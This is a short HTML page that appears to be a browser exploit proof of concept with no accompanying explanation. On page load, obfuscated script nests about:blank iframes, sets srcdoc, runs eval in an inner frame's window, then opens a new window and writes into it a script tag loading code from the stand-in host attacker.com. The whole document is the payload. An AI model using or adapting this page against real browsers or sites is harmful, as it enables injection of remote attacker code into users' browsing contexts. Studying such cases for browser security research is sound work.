<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGNCQeOGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGNCQeOGGGGG.addEventListener("load",()=>{GGGGGNCQeOGGGGG.srcdoc="<iframe id=GGGGNCQeOGGGG src=about:blank><\/iframe><script>GGGGNCQeOGGGG.onload=_=>GGGGNCQeOGGGG.contentWindow.eval('w=window.open(`about:blank`); w.document.write(`<script src=https://attacker.com/static/static.js><\\/script>`);');GGGGNCQeOGGGG.contentWindow.location.reload();<\/script>";},{once:true});
};
</script>
</body>
</html>